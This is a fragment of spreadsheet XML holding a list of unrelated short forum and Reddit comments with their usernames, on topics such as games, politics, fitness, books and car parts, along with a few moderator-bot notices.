    <t>ronsealdeath said: ↑ Get a good used one, they aren’t expensive. I found garrett chinese ripoffs to also be pretty decent. But yes a recon is the best option, but also expensive I found recon one for £198 plus £60 exchange deposit on EBay so just ordered that. Had thought about used or fitting replacement cartridge myself but they were about £90 so worth it for extra £100 and come with 2 year warranty</t>
  </si>
  <si>
    <t>NSH_IT_Nerd</t>
  </si>
  <si>
    <t>I was just about to say something like this. On the other hand, the three old ladies drinking Rita Spritzes have made me laugh every time I’ve seen them so far. “They’re life and refreshing with notes of...” “ALCOHOL”</t>
  </si>
  <si>
    <t>Dothemath2</t>
  </si>
  <si>
    <t>You know, depending on experience? Obviously some people are faster than others. Some people use CO2 others use a hand pump. Some people don’t even know how to change a tire. I stand corrected, I should have said 5 to 40 minutes.</t>
  </si>
  <si>
    <t>Curious-Cat-2020</t>
  </si>
  <si>
    <t>They can use safety switch.</t>
  </si>
  <si>
    <t>jonnyinternet</t>
  </si>
  <si>
    <t>&gt;Meteorologists are the World's best seers r/jokes is over here</t>
  </si>
  <si>
    <t>jermdizzle</t>
  </si>
  <si>
    <t>Thanks, I appreciate you sharing that. It's hard to understand what makes people do things like that. The risk-to-reward ratio is so high. At least the guy selling cocaine had a compelling reason: hundreds of thousands of dollars. Maybe the low reward was part of what made the guy do it. Sometimes something like that can cloud judgement. I almost fell victim to such a stupid act when I was in the military. An OSI officer brought a few boxes of .40 caliber pistol ammo to us to be disposed of. I took custody, but before filling out any paperwork, he mentioned offhandedly that it's too bad he didn't know anyone with a .40 caliber gun. "I know several of us have them. We go shooting together regularly." Oh? He said. Well, we don't really care how they get disposed of, as long as the ammo is gone. I signed all the paperwork saying we'd dispose of them (detonation during explosives training that we perform almost weekly). Something just didn't feel right, and it seemed like breaking the rules with the full knowledge of the OSI, an office known for entrapping people and being two faced, was not a good idea. I took the rounds out of my desk and labeled them for disposal and locked them in our small explosives safe. I made a big point of calling the osi office, getting the officers emails, and writing an email to the officers who had given them to me document our planned disposal of the items that Friday. I did this under the premise that I just wanted them to have the info; which is exactly true, but because I was covering my ass with a virtual paper trail, not because I would have normally been so formal about a disposal. It was probably no big deal, and I probably overreacted. They probably really just thought that it'd be cool if we got to enjoy some target practice while accomplishing the goal of destroying the old evidence. However, it would have definitely not been an approved disposal method to use personal firearms out at a desert shooting range at whatever date we felt like. $30 worth of ammo just wasn't worth it, but it's the worthlessness of the item that almost caused me to do something stupid, possibly dragging others into it with me.</t>
  </si>
  <si>
    <t>Kerrs468</t>
  </si>
  <si>
    <t>Excellent watch if you can't afford an apple watch. I love the features of this watch just wish it was more compatible with iPod.</t>
  </si>
  <si>
    <t>TheFluffThatcould</t>
  </si>
  <si>
    <t>6 days. Suffered a really nasty night terror and couldn't sleep.</t>
  </si>
  <si>
    <t>lonelytwatwaffle</t>
  </si>
  <si>
    <t>It seems like *forever* since I have posted on a WDT! I have missed you all so much! I just sent out a huge batch of postcards yesterday to say thank you for your sympathy. I still have another round to go, so if you haven't received yours yet, it's coming. All the postcards came from my mom's collection. This week, I wrote my first real card that wasn't a sympathy card since Valentine's Day. After six months, I'm completely out of practice! Just have to keep cranking them out, I guess :) Unexpectedly, it's a time of rebirth for me. I've crossed off some bucket list items, particularly piercing my eyebrow and purchasing a handgun. I have my parents' vehicle now so I'm relieved to finally have 4-wheel drive for the mountains as well as having reliable wheels again... It's time to start road tripping again. I've been entertaining myself with foreign film. I select one and watch it multiple times that week. I designated August as Finnish Month since I watched Lapland Odyssey, Heavy Trip, and The North Road. By the end of the month, I developed a crush on Jasper Pääkkönen and now I watch all of his fly fishing clips :D If you have any foreign film recommendations, I would love to hear them!</t>
  </si>
  <si>
    <t>HynerianDiplomacy</t>
  </si>
  <si>
    <t>i have seen people get swarmed by hopping grineer crouching on that rock. it might work some of the time or most of the time but it will not work every time.</t>
  </si>
  <si>
    <t>aickman</t>
  </si>
  <si>
    <t>*The Darkest Part of the Woods* by Ramsey Campbell fits your request very well. Also, you might enjoy *The October Country* by Ray Bradbury, which is an excellent collection of short horror stories.</t>
  </si>
  <si>
    <t>TaresPL</t>
  </si>
  <si>
    <t>I know, just I don't like to put anything there right now. Interaction with doors/game generally felt clunky when had any spell there.</t>
  </si>
  <si>
    <t>Wasphammer</t>
  </si>
  <si>
    <t>Interpreter? Shadow really IS blind as a bat.</t>
  </si>
  <si>
    <t>MeekWell</t>
  </si>
  <si>
    <t>certainly looks a lot like him!</t>
  </si>
  <si>
    <t>carseatheadass</t>
  </si>
  <si>
    <t>omg he’s flying</t>
  </si>
  <si>
    <t>Vendersly</t>
  </si>
  <si>
    <t>Well I mean how would it know it's on YouTube if it can't check the websites your own. No thought</t>
  </si>
  <si>
    <t>La Trucha</t>
  </si>
  <si>
    <t>Tomas Romero’s growth as a goalkeeper shows in USL Championship Player of the Week performance</t>
  </si>
  <si>
    <t>troyantipastomisto</t>
  </si>
  <si>
    <t>Nice being in the field I can’t wait to dig into this. I have seen a few cool data visualizations on Instagram from an account called Bayesian Babe that are pretty cool, thanks</t>
  </si>
  <si>
    <t>Halloran_da_GOAT</t>
  </si>
  <si>
    <t>Lol no kidding...In what world is “People should dress appropriately” an unpopular opinion? It *literally* builds in a modifier that allows everyone to agree—“appropriately.” I’d love to find the person who disagrees with the sentiment that people should wear the clothes that they should wear. “No! They should wear the stuff that they *shouldnt* wear!”</t>
  </si>
  <si>
    <t>RisKQuay</t>
  </si>
  <si>
    <t>Just pitching in - I've experienced all of these bugs multiple times, except #8, because I haven't run endurance.</t>
  </si>
  <si>
    <t>Yin-Hei</t>
  </si>
  <si>
    <t>Wait there are literally 3+ other comments said "give me back my eye". Who r the real chinese</t>
  </si>
  <si>
    <t>MethodicMarshal</t>
  </si>
  <si>
    <t>I would freak out thinking I’m getting jumped. In high school people used to take off their shirts, put it over the victim’s head and start punching quick</t>
  </si>
  <si>
    <t>Lego-lewis</t>
  </si>
  <si>
    <t>Yes he is surprised people now he exists to be honest</t>
  </si>
  <si>
    <t>Londii_</t>
  </si>
  <si>
    <t>For now ill say yet, but atleast you get rewards when your team wins MSI or Rift Rivals. We just got dead servers.</t>
  </si>
  <si>
    <t>splanket</t>
  </si>
  <si>
    <t>The 4 victims definition only requires that 4 people be shot. No one has to die for it to be a “mass shooting” by that definition.</t>
  </si>
  <si>
    <t>BravoFantasy</t>
  </si>
  <si>
    <t>I'm a Geno fan, I wouldn't mind Tracer, but I'd MUCH prefer D.Va, but I get why they'd choose the postergirl for OW as a character.</t>
  </si>
  <si>
    <t>mwmwmwmwmmdw</t>
  </si>
  <si>
    <t>&gt; and being stepped on https://i.imgur.com/xXwSkl9.jpg</t>
  </si>
  <si>
    <t>chadbot</t>
  </si>
  <si>
    <t>ah so it sounds like a bit of both then. nothing can be done there to be honest. i had a stepfather that acted much the same. Nothing you can do really. and if you live with them still best thing you can do is ignore him and move out as soon as possible.</t>
  </si>
  <si>
    <t>oipfish11</t>
  </si>
  <si>
    <t>Idk man. I think people get scared when they walk up real close to take a picture of the cute lil bear and then she fucks you up because you were to close to her babies. So I’m not sure why people aren’t scared* *are stupid</t>
  </si>
  <si>
    <t>nukethem</t>
  </si>
  <si>
    <t>JUST CHEW REGULAR GLASS AND BREAK IT YOURSELF</t>
  </si>
  <si>
    <t>fackusps</t>
  </si>
  <si>
    <t>Sir you have to realize that my sister has autism. Your standards might not match up to her but this is art very much to her. Simply saying that this is not real art is the biggest bigotry I witnessed and not only that you are looking down on disabled people. Shame on you sir.</t>
  </si>
  <si>
    <t>JustAnotherToxicDude</t>
  </si>
  <si>
    <t>I don't understand why ep 19 is so hyped..i binged the show the last 2 days up to that episode, and i don't understand...</t>
  </si>
  <si>
    <t>Krowlander</t>
  </si>
  <si>
    <t>i could suggest a lich or dust lich. A Lich is a medium undead, it is created with a ritual so that works for what your trying it has a cr of 21 if your going endgame stuff or the dust lich which is a failed version of a lich and got lucky and survived the ritual. here is the site for the lich: [https://www.dndbeyond.com/monsters/lich](https://www.dndbeyond.com/monsters/lich) and here is the one for the dust lich: [https://www.dandwiki.com/wiki/Dust\_Lich\_(5e\_Creature)](https://www.dandwiki.com/wiki/Dust_Lich_(5e_Creature))</t>
  </si>
  <si>
    <t>RalphWolfsNemesis</t>
  </si>
  <si>
    <t>Find a job you love and you'll never work a day in your life. Or you can do this if you're unemployed.</t>
  </si>
  <si>
    <t>murd3rofcr0ws</t>
  </si>
  <si>
    <t>40k is mint because, imo, it is a future history. Almost everything has already happened. So you're left with a universe that feels extremely *old*, which is what you want for a far-future setting.</t>
  </si>
  <si>
    <t>LittleTinySock</t>
  </si>
  <si>
    <t>Ya the psvr slides the lenses forward and back but that's more just to assist in taking the headset off. It has to be centered on your face to see and if its even slightly off it will make be blurry. If the perifoherals on the quest are more clear then that will probably drive you nuts on the psvr. I've definitely noticed a barrel effect and it's annoying to find the center but you get to know where to place it after a while. Setup for the headset with the camera is annoying but should only have to be done once. The chords and external camera can be an issue and if I was used to using a system that didnt have them it would be difficult to get used to. I found when I placed the camera a little over 2 metres high I had 360 tracking and rarely had any issues. Also having the headset chord run from the ceiling will help a lot otherwise you risk hitting it and getting a bit tangled on occasion. All this means it's way too annoying to move into another room though. The psvr has been fine but I'd like to get a PC headset eventually. I have to look into it more because I'm not familiar with them and what's coming out.</t>
  </si>
  <si>
    <t>ByGollie</t>
  </si>
  <si>
    <t>&gt;absolutely nothing ummmm sure [No-deal Brexit will hammer both UK and EU - FT.com](https://www.ft.com/content/f9a5fd52-4b2a-11e9-bbc9-6917dce3dc62) The Financial Times is a reputable financial newspaper that doesn't deal with guesses and fearmongering. If they post a detail financial analysis, it's most likely correct. Here's the [entire report in question](https://www.bertelsmann-stiftung.de/fileadmin/files/user_upload/EZ_Estimating_the_Impact_of_Brexit_2019_ENG.pdf), by well-respected financial researchers better qualified in economics than you. Please feel free to analyse and critique their methodologies and conclusions. Be sure to provide valid qualified evidence for your critiques. You're welcome to try again, but try avoid punching yourself in the testicles this time.</t>
  </si>
  <si>
    <t>BABUSHKAROCKY</t>
  </si>
  <si>
    <t>Me too. Ready to go</t>
  </si>
  <si>
    <t>Hahonryuu</t>
  </si>
  <si>
    <t>He was useful to Obama to be able to say "look at this safe, old, fairly conservative, white male running with me" and nothing more. Only thing he makes me nostalgic for are the memes. We can do better than memes. We SHOULD do better than a meme. Most importantly, we NEED to do better than a meme. I'd rather vote for the bubonic plague than Trump so its not like I won't vote for Biden if I'm forced to...but he's not MY democratic candidate.</t>
  </si>
  <si>
    <t>wazzler70</t>
  </si>
  <si>
    <t>Found my stealth build pipe rifleman a bit weak as stealth nerfed for the primal cuts events so built a camp at the savage divide event location, had loads of visitors, sold out almost all my ammo, also sold loads of plans and recipes, flux and fusion cores. Final score: added 7 levels, looted loads of acid, springs, adhesive and gold as well as meat to cook and sell at Sutton station, ended up with something over 15,000 caps (all spent already) and I now have over 600 Script :) Also bought an explosive pipe revolver and an explosive pipe gun at player vendors, just what I have been looking for. Had a total blast during meat week Thanks to all who joined in, and massive thanks to Madge or Marge who gave me a whole bunch of legendaries. Vault 76 dwellers rule the wastelands!</t>
  </si>
  <si>
    <t>M.MAHI</t>
  </si>
  <si>
    <t>Sep 5th 1600 towns &amp; cities Any List For Cities ?</t>
  </si>
  <si>
    <t>Where_to_now</t>
  </si>
  <si>
    <t>They're the world leaders on firearm development, making sure their products are safe for the operator is a big part of that. A lot of time and money is spent to prove that firearms are safe, you can look up the Sig P320 issues if you want to see what happens when you don't. Now, whether the operators are safe is another question, but I'd argue that American police are much more likely to be proficient in the use of their sidearms.</t>
  </si>
  <si>
    <t>orelk</t>
  </si>
  <si>
    <t>Both Kirby games are great, but Robobot is the better one</t>
  </si>
  <si>
    <t>Xt3rminat3</t>
  </si>
  <si>
    <t>Thank you, any and all advice helps.</t>
  </si>
  <si>
    <t>TheRockWarlock</t>
  </si>
  <si>
    <t>The way you worded your comment sound aggressive, idk. Sorry</t>
  </si>
  <si>
    <t>JontonSubrem</t>
  </si>
  <si>
    <t>The blop is the best part</t>
  </si>
  <si>
    <t>APP0LO</t>
  </si>
  <si>
    <t>Interesting selection, I approve</t>
  </si>
  <si>
    <t>2DWomenForMeThanks</t>
  </si>
  <si>
    <t>ya that's why he banned the dude from Maralago</t>
  </si>
  <si>
    <t>JamesIsSoPro</t>
  </si>
  <si>
    <t>Because lubys cant install pylons that physically prevent guns from passing them? Seems pretty obvious to me...</t>
  </si>
  <si>
    <t>Money_Fish</t>
  </si>
  <si>
    <t>It seems you're very attached to this plant but unfortunately after that fruit ripens, the plant will die. As for why the crown is growing so out of control, I'm not sure. Have you been fertilizing it with high nitrogen food?</t>
  </si>
  <si>
    <t>Samidoesstuff</t>
  </si>
  <si>
    <t>A turkey sandwich</t>
  </si>
  <si>
    <t>propshaft</t>
  </si>
  <si>
    <t>Suck it up buttercup your wailing's fall upon deaf 'Deplorable' ears !</t>
  </si>
  <si>
    <t>thedonmoose</t>
  </si>
  <si>
    <t>Something got shifted maybe? Either way 64.7+5.3 = £70m = ~€75m. So it's either €65m+10m addons or €70m+5m addons</t>
  </si>
  <si>
    <t>IsitWHILEiPEE</t>
  </si>
  <si>
    <t>NAH. You should take a second and consult your inner voice to see if things like this are worth the fight over, but she shouldn't push the plate towards you. It's not surprising considering your ages, but work on communicating with each other and know what quirks are worth a stand and which ones aren't.</t>
  </si>
  <si>
    <t>Pyrrhura_molinae</t>
  </si>
  <si>
    <t>This is less reality than the image in the media. Voter registration is a fairly mundane non-issue for most people most of the time in the vast majority of jurisdictions. We live in a Federal system with a patchwork of jurisdictions.This isn't France. Reality is being presented to you through the prism of various media. You, as an individual, probably have little in little in depth understanding of the details in the various states and jurisdictions with maintaining valid voter rolls. The issue seems to be the politicization in some jurisdictions, and not the need to maintain voter rolls accurately. Obviously, states like Georgia are weaponizing voter rolls, and these types of issues were historically dealt with through the Voting Rights Act. Blame SCOTUS for gutting it, and Congressional Republicans for not fixing it.</t>
  </si>
  <si>
    <t>JIMMYJAMES27278</t>
  </si>
  <si>
    <t>A good idea gone too far.</t>
  </si>
  <si>
    <t>Vareten</t>
  </si>
  <si>
    <t>I think that there aren't enough opportunities to utilize the Speech skill in order to actually make it the core of your build.</t>
  </si>
  <si>
    <t>azuth89</t>
  </si>
  <si>
    <t>In public school, no. There was a dress code but it was generic like "cotton shorts or workout pants" and no one gave a damn unless you tried to wear jeans. Movies and books use strict cliques, uniforms and the like to create instant context rather than having to explain things. That trend is about lazy production and writers more than reality</t>
  </si>
  <si>
    <t>irishdancer2</t>
  </si>
  <si>
    <t>It sounds like it was all this one time.</t>
  </si>
  <si>
    <t>There’s no one age. Its whenever their body develops</t>
  </si>
  <si>
    <t>crassFavourite</t>
  </si>
  <si>
    <t>I feel like every day at the White House begins with this song</t>
  </si>
  <si>
    <t>BioQuake</t>
  </si>
  <si>
    <t>Nah, it's a red light so I can signal I'm hit to the enemy team at night. Though I suppose it could double as one.</t>
  </si>
  <si>
    <t>HAEAYEHAHE</t>
  </si>
  <si>
    <t>Of course! There’s a lot of fantasy books with strong romance plots. Once you get access to a few, you can find a lot of others as well</t>
  </si>
  <si>
    <t>Slauderek</t>
  </si>
  <si>
    <t>Unpopular opinion: I can care less about relationships in tv shows and movies</t>
  </si>
  <si>
    <t>DrewCarnegie</t>
  </si>
  <si>
    <t>Snowymonk said: According to EDSM, only 0.6% of active commanders own a Cobra MkIV. It's almost as if it wasn't available to everyone. You might almost call it 'exclusive'.</t>
  </si>
  <si>
    <t>nainako hari</t>
  </si>
  <si>
    <t>Started by Logan Lam in Questions 43 minutes ago. 0 Replies 0 Likes 400 video hours go to YouTube consistently, while individuals watch a billion hours of video content there consistently. Around two billion month to month dynamic clients are on YouTube, and 68% of them watch a video to enable them to settle on a buy choice. YouTube advertisements get watcher consideration 83% of the time, and clients are multiple times bound to watch a video instructional exercise or guide contrasted with understanding it. Long story short, Oakland in the event that you don't have a YouTube channel or don't make recordings to draw in your group of spectators, ample opportunity has already past to begin. Consider video content when making your showcasing technique and make a point to streamline it in like manner for higher rankings and greatest outcomes. Consider video content when making your promoting methodology and make a point to upgrade it in like manner for… Continue</t>
  </si>
  <si>
    <t>sellis80</t>
  </si>
  <si>
    <t>Gotta love Slough. Need to find some of Reading next. My eBay notifications will be fucked</t>
  </si>
  <si>
    <t>nunnyf</t>
  </si>
  <si>
    <t>I STRUGGLED WITH THE WEBSITE FOR A HALF AN HOUR AND THEN LOADED CHAT. THE TECH PERSON GAVE ME A BUNCH OF TECHNICAL BABBLE AND I OPTED OUT. I THEN READ SOME REVIEWS AND REALIZED I COULDNâT USE THE IPAD TO ORDER. I THEN DOWNLOADED THE APP AND THE ORDER WENT THROUGH BUT THERE WAS NO WAY I COULD GET THE 100 FREE PRINTS ADVERTISED. I FOUND THE ORDERING PROCESS CONFUSING. I DID USE A COUPON CODE FOR SHIPPING BUT WOULD HAVE PREFERRED THE 100 FREE PRINTS. I HAVE SEVERAL ALBUMS STORED FROM MANY YEARS AGO AND HAVE ALWAYS LIKED SNAPFISH BUT WISH THE ORDERING PROCESS WAS EASIER.</t>
  </si>
  <si>
    <t>grandnew</t>
  </si>
  <si>
    <t>I'd like to see a 433 tried but other than that I agree</t>
  </si>
  <si>
    <t>JeevesThePostMaker</t>
  </si>
  <si>
    <t>Hey there, Unfortunately, your post was automatically removed because you failed to assign it a flair within 5 minutes. If you assign it a flair, your post will be automatically re-approved shortly after. To assign a flair to your post, click the button titled "Click here to edit your flair" underneath the post. If you are on mobile or have CSS turned off, the button is just titled "Flair" [Example With CSS](https://i.imgur.com/9TTfq91.png) | [Example Without CSS](https://i.imgur.com/3V6ugiq.png) If you're having difficulty finding the flair button keep in mind: You -can't- flair your posts if you're: * Submitting via reddit mobile on a browser. You -can- flair your posts if you're: * Submitting via the reddit mobile app, and a variety of other reddit apps. * Submitting via a desktop version of the reddit site on your mobile browser. You can force this view from the menu options. You can choose either of the options above to flair a submitted post. --- ^(Have a question or think a mistake was made?) **[^(Message the moderators because I am a bot.)](http://www.reddit.com/message/compose?to=%2Fr%2Fhearthstone)**</t>
  </si>
  <si>
    <t>Self-Medicated-Dad</t>
  </si>
  <si>
    <t>Cloudy with a chance of meatballs</t>
  </si>
  <si>
    <t>&gt;&gt;21877101 Grelia has no time for dates, she's too busy saving lives.</t>
  </si>
  <si>
    <t>SortofSteve</t>
  </si>
  <si>
    <t>Good idea. My vote is for a zip line down the other side.</t>
  </si>
  <si>
    <t>jfreez</t>
  </si>
  <si>
    <t>It's everywhere where it's hot. We have the weather Channel on TV at work and they're constantly showing this stuff from all around the country. I don't understand how any parent could do this unless drugs, alcohol, and/or mental instability are at play. But... It happens.</t>
  </si>
  <si>
    <t>hrhdamselofdeth</t>
  </si>
  <si>
    <t>In this day and age what is a long term career? There is no employer loyalty or pension. I'm not saying you should go get addicted I'm saying this is why many people get addicted to drugs.</t>
  </si>
  <si>
    <t>theprefferedphallus</t>
  </si>
  <si>
    <t>Our gd is now 0 anyway.</t>
  </si>
  <si>
    <t>beansterkins</t>
  </si>
  <si>
    <t>No, not at all actually and am not a dude. :)</t>
  </si>
  <si>
    <t>OdBx</t>
  </si>
  <si>
    <t>Alright mr big brain</t>
  </si>
  <si>
    <t>Essentials-</t>
  </si>
  <si>
    <t>Worth.</t>
  </si>
  <si>
    <t>PHLATBEDD</t>
  </si>
  <si>
    <t>I cant say that I'm not tempted.</t>
  </si>
  <si>
    <t>JaviVader9</t>
  </si>
  <si>
    <t>It's interesting... You picture both bodies as I do, but the faces are pretty much the opposite to me</t>
  </si>
  <si>
    <t>Licheno</t>
  </si>
  <si>
    <t>Title, thanks</t>
  </si>
  <si>
    <t>gorogoroman</t>
  </si>
  <si>
    <t>There's a couple things I don't understand at the moment but maybe it'll be addressed later in the show? * Are they spying from a distance, or actually living with Tsukasa again? In either case, wouldn't he get suspicious of them being around (if he encounters them)? After all, he did "kill" their friend * Did Senkuu actually tell Tsukasa the formula to revive people? It seems a little illogical; he could have just told him just about anything and he probably would have believed it, or even the correct stuff but with the wrong portions so that he has to spend time "rediscovering" it. Without the proper formula, Tsukasa's army would be pretty much nonexistent by the time Senkuu builds his</t>
  </si>
  <si>
    <t>Simply_Konrad</t>
  </si>
  <si>
    <t>This ain't no ghost. This is Cthulhu. Confirmed.</t>
  </si>
  <si>
    <t>Wonganella</t>
  </si>
  <si>
    <t>↑ GLA still it's only $35 000 worth... The only reason 0.001 wasn't re loaded was because everyone has forgotten about it... Expand Yes both your points are true and correct. BUT someone did throw out $ 35, 000 on a dormant stock out of the blue, a stock indeed which all day before that late event and for six months prior has been valued at nothing. GLA will be in focus next week I reckon.</t>
  </si>
  <si>
    <t>chrisvenn</t>
  </si>
  <si>
    <t>Need a new one of these as dropped mine and now it leaks thanks</t>
  </si>
  <si>
    <t>The Forever Deplorable Adytum</t>
  </si>
  <si>
    <t>Doesn't that fat idiot have a bake sale to eat somewhere?</t>
  </si>
  <si>
    <t>dracoantares</t>
  </si>
  <si>
    <t>I’m too poor to understand these rich people jokes</t>
  </si>
  <si>
    <t>nightopenedmyeyes</t>
  </si>
  <si>
    <t>&gt;It's just silly to me, especially considering young folks and city folks in general talk that way regardless of ethnicity. I don't get your argument here. Both terms refer to black people anyway.</t>
  </si>
  <si>
    <t>livelifeinneon</t>
  </si>
  <si>
    <t>Thames, Stronach are both nice. I’ve heard Byron’s new one is super nice. Basically any of the ones that are redone.</t>
  </si>
  <si>
    <t>protomor</t>
  </si>
  <si>
    <t>Released a few hundred ssns to the public. Some with names and addresses.</t>
  </si>
  <si>
    <t>SoloHappyCup</t>
  </si>
  <si>
    <t>They can go into public places with you if you have a letter from your doctor certifying that it as an assistance animal for a documented medical condition.</t>
  </si>
  <si>
    <t>hurricanematt</t>
  </si>
  <si>
    <t>It really depends on your intended use. But in some instances the longer wheel base will provide a smoother ride due to greater time between front and rear wheels hitting bumps</t>
  </si>
  <si>
    <t>MoblieModle</t>
  </si>
  <si>
    <t>The new FNAF game looks terrifying.</t>
  </si>
  <si>
    <t>SpideyTingle</t>
  </si>
  <si>
    <t>Neat creature! Is that a Ducati Scrambler?</t>
  </si>
  <si>
    <t>WorstJudo</t>
  </si>
  <si>
    <t>I like to wear 10 year old blue belt ranked gear when I do no gi. Love how it makes visitors feel.</t>
  </si>
  <si>
    <t>WellOkayyThenn</t>
  </si>
  <si>
    <t>Hi andreialexuc, thank you for your submission to /r/woooosh! Unfortunately it has been removed for the following reason(s): * **Rule 2.** **No identifying information:** censor ALL screen-names and real names, **including your own!** Verified/Popular users do not need to be censored. *If you feel this was done in error, or would like further clarification, please don't hesitate to [message the mods.](https://www.reddit.com/message/compose?to=/r/woooosh)*</t>
  </si>
  <si>
    <t>shauntheghoul</t>
  </si>
  <si>
    <t>It's with fire (old it's been patched but it was how to craft it)</t>
  </si>
  <si>
    <t>LordArs</t>
  </si>
  <si>
    <t>I don't think that the vigilante has ever been on sale.</t>
  </si>
  <si>
    <t>DanielJStein</t>
  </si>
  <si>
    <t>Damn you are vibing hard right now. 2015 was one of the best years of my life and when I really started to dig deeper into astrophotography. I a not sure how you did it, but you really got me thinking about summer of that year in particular. Ode to much simpler and carefree times my friend...</t>
  </si>
  <si>
    <t>Donttakethisname_35</t>
  </si>
  <si>
    <t>10 second reply holy shit Dave Also you really need to chain yourself to something. You still haven’t recovered from that debacle</t>
  </si>
  <si>
    <t>Texas_Rockets</t>
  </si>
  <si>
    <t>You aren't expected to have memorized history. You can make up facts if you want. It's entirely about how you argue your points and how you write. Also, the prompts are vague to provide enough ambiguity for you to argue about the underlying principals. Honestly, writing prompts in general are hardly ever anything but vague.</t>
  </si>
  <si>
    <t>Waaaaalmart</t>
  </si>
  <si>
    <t>I experienced this today pray for me</t>
  </si>
  <si>
    <t>TheBatJeff</t>
  </si>
  <si>
    <t>YOU'RE JUST A SHILL FOR THE COLD WATER INDUSTRY!!!!!</t>
  </si>
  <si>
    <t>InMooseWeTrust</t>
  </si>
  <si>
    <t>Libra just looks like another stable coin. What happens during the next financial crisis?</t>
  </si>
  <si>
    <t>&gt;&gt;67899436 A little of column A, a little of column B. Many were bad before the war, most are much worse after the war.</t>
  </si>
  <si>
    <t>nucumber</t>
  </si>
  <si>
    <t>yeah, but freedomz, and freedomz just another word for profit</t>
  </si>
  <si>
    <t>lammons</t>
  </si>
  <si>
    <t>Yes! Usually for my LISS I’ll attend a workout class such as Pilates or spin so I’m sure you could count barre!</t>
  </si>
  <si>
    <t>snickandtwixmom</t>
  </si>
  <si>
    <t>If you can do it, do it. Your body will wake you up and you will be too uncomfortable before baby is harmed. My bump is too big but I miss it soooo bad, lol</t>
  </si>
  <si>
    <t>nitewong</t>
  </si>
  <si>
    <t>I love how we got to see him develop</t>
  </si>
  <si>
    <t>MrGraffio</t>
  </si>
  <si>
    <t>Get the fuck out</t>
  </si>
  <si>
    <t>CafeReader</t>
  </si>
  <si>
    <t>I'm pretty big into combo, I built familiars a couple of months ago and have truly been loving it, but only having the one can be a bit repetitive. Any other recommendations for combo-y decks?</t>
  </si>
  <si>
    <t>CinnamonSwisher</t>
  </si>
  <si>
    <t>Does no one watch Netflix for the non originals anymore? I watch a shitload of Netflix and pretty much never touch their originals except for maybe 5 shows a year. But everytime I see conversations about whether Netflix is worth it it’s purely contained to their originals. They still have tons of other movies and tv shows that are amazing that make it more than worth the price.</t>
  </si>
  <si>
    <t>RoYeeet</t>
  </si>
  <si>
    <t>People of Reddit who were there during an iconic esports moment, how was the experience?</t>
  </si>
  <si>
    <t>Jakob_nobby</t>
  </si>
  <si>
    <t>Yeah, maybe. I just want to workout atleast 5 times a week because I have been doing it 6 days a week for a while and I feel like I can't go down to only 3 lol. I'll try what I have in mind and if I feel I need more rest or not getting results, I'll change it:)</t>
  </si>
  <si>
    <t>Nicki_05</t>
  </si>
  <si>
    <t>Really, its motivating me to get better :) lets get it!!! (also im not saying that I dont like the memes or people's stories, those also really help me to relate to things and feel like im not alone)</t>
  </si>
  <si>
    <t>robfloyd</t>
  </si>
  <si>
    <t>Ah yes, the famed California Burgundies and Bordeaux</t>
  </si>
  <si>
    <t>Kaane55</t>
  </si>
  <si>
    <t>Hello! I'm looking for some interesting saltwater setup, I'm looking for something colorful,I have a 52 gallon tank, Around 150 dollars budget.</t>
  </si>
  <si>
    <t>_IAAI_</t>
  </si>
  <si>
    <t>I still have yet to play breath of the wild. Mostly due to life and work.</t>
  </si>
  <si>
    <t>Andro5pt0</t>
  </si>
  <si>
    <t>Wow....meager incentive to drudge through bugs, poorer performance after every patch, microstutters and one frame deaths for what looks like 2 hours tops to complete this. Woohoo! (insert sarcasm) Long time franchise fanboi and all I can do is SMH at this point....hopefully EA doesnt drop the ball on NFS and I was at least smart enough not to pre-order the deluxe edition this time.....sigh....</t>
  </si>
  <si>
    <t>BreakingSynchro</t>
  </si>
  <si>
    <t>I don't know for sure. The only time something comparable has happened was the breakup of the Soviet Union.</t>
  </si>
  <si>
    <t>capicolasalami</t>
  </si>
  <si>
    <t>Extremely disingenuous to say. Scott has actually been good, and at his worst he's never been exceptionally worse than the others. Pogba has been pogba (world class sometimes, annoyingly indecisive on the ball others). Relying on them 2 is risky from Ole. But only 2 weeks ago people were saying how good we looked against (an albeit disorganized) chelsea. People just flip flop their opinions based on how they feel at the moment. I'm sure if we get a few back to back wins it'll be "Man Utd is finally hitting their groove"</t>
  </si>
  <si>
    <t>burugaz</t>
  </si>
  <si>
    <t>Testament to chance encounters that foster character. I feel really sad for bad kids that stay bad, who maybe could have been great if they had met some of the right people along the way or maybe raised in another place.</t>
  </si>
  <si>
    <t>thejaga</t>
  </si>
  <si>
    <t>No, it's not it, or stock prices would only change once a quarter. You can't be this simplistic...</t>
  </si>
  <si>
    <t>Ray Zee</t>
  </si>
  <si>
    <t>tenure is a ripoff to those that pay the bills and to those that have to suffer through substandard performance. great for those that get it. any kind of forced job security breeds mediocre overall performance of the total, though not necessarily an individuals. it has to.</t>
  </si>
  <si>
    <t>Pintero</t>
  </si>
  <si>
    <t>It’s a RP Server with PVP turned permanently on (Besides in below 15 level zones.) with all the good the bad and the ugly that may bring. is a good TLDR</t>
  </si>
  <si>
    <t>crimxona</t>
  </si>
  <si>
    <t>If you have Aeroplan miles you pay whatever Aeroplan charges you. If you want to pay the United rate, you go get the required united miles</t>
  </si>
  <si>
    <t>&gt;&gt;109392010 Best: Tegridy Farms Worst: 201</t>
  </si>
  <si>
    <t>SeemsImmaculate</t>
  </si>
  <si>
    <t>Think what this guy must have gone through. He would have been conscripted during WW2 - imagine trying to be gay in the military. Then the stigma of the Thatcher years and the AIDS crisis. This guy's bravery is the reason we can walk around so openly today.</t>
  </si>
  <si>
    <t>Redscoped</t>
  </si>
  <si>
    <t>What are you talking about? This is completely insane. Drink driving is banned because they have done tests to prove it impedes ones ability to drive a car. It is not based on anecdotes it is based on research and study by various bodies over many years. People have done testing with computer games and not found any links to increase levels of violence in the subjects. Nor has any direct link be made to computer games and mass shooting or even murders. One case I do recall the mother claimed the murder her son did was due to her son playing manhunt. It turns out what she fail to mention was a her son was also a drug dealer and the murder was related to him suppling drugs to another kid. If you assume playing an FPS makes you a mass shooter than why does playing Sim City not make to a mayor of a town?</t>
  </si>
  <si>
    <t>Tobad917</t>
  </si>
  <si>
    <t>Rage was the best</t>
  </si>
  <si>
    <t>omega_entity</t>
  </si>
  <si>
    <t>Classy.</t>
  </si>
  <si>
    <t>Lyn1987</t>
  </si>
  <si>
    <t>This is how we were ordered to eat bananas while in boot camp. For no other reason than to keep us from making blow job jokes at one another.</t>
  </si>
  <si>
    <t>Marlyman1991</t>
  </si>
  <si>
    <t>Due to New PVP Rule Anyone Using BB Hashi Just Curious If His Worth Limit Breaking Atm.</t>
  </si>
  <si>
    <t>HereForTheDough</t>
